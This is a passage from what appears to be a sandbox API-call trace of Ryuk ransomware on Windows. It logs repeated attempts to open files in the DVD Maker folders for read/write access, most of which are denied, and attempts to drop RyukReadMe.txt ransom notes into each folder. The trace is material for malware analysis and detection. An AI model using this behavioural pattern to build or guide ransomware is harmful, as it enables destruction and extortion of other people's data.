dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.635] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.635] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.635] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.635] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png", dwFileAttributes=0x80) returned 0 [0133.636] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.636] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.636] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.636] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.636] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.636] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png", dwFileAttributes=0x80) returned 0 [0133.636] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.636] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.636] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.636] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.636] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.637] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png", dwFileAttributes=0x80) returned 0 [0133.637] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.637] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.637] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.637] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.637] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.637] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png", dwFileAttributes=0x80) returned 0 [0133.637] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_title.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.637] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.637] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.638] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.638] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.638] SetLastError (dwErrCode=0x0) [0133.638] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.641] GetLastError () returned 0x5 [0133.641] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.641] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.641] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.641] SetLastError (dwErrCode=0x0) [0133.641] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.641] GetLastError () returned 0x5 [0133.641] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.641] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.641] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.642] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.642] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.642] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.643] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.643] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.643] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.643] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.643] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.643] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png", dwFileAttributes=0x80) returned 0 [0133.643] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.644] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.644] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.644] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.644] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.644] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0133.644] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.644] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.644] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.644] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.644] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.645] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png", dwFileAttributes=0x80) returned 0 [0133.645] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.645] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.645] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.645] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.645] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.645] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.646] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.646] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.646] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.646] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.646] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.646] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.646] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.646] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.646] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.647] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.647] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.647] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.647] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.647] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.647] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.647] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.647] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.648] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.648] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.648] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.648] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.648] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.648] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.648] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.648] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.648] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.648] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.649] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png", dwFileAttributes=0x80) returned 0 [0133.649] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.649] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.649] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.650] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.650] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.650] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png", dwFileAttributes=0x80) returned 0 [0133.650] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.650] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.650] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.650] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.650] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.651] SetLastError (dwErrCode=0x0) [0133.651] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.653] GetLastError () returned 0x5 [0133.653] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.653] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.653] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.653] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.654] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.654] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_babypink_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.654] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.654] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.655] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.655] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.655] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.655] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.655] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.655] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.655] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.655] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.655] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_highlights_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.656] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.656] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.656] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.656] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_performance_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.656] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.656] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.656] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.656] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.657] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.657] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.657] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.657] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.657] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.657] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.658] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.658] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_plain_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.658] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.658] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.658] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.658] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.658] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.658] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_postage_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.658] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.658] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.659] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.659] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.659] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.659] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_scrapbook_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.660] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.660] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.660] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.660] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.660] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp", dwFileAttributes=0x80) returned 0 [0133.660] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_specialocc_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.660] CloseHandle 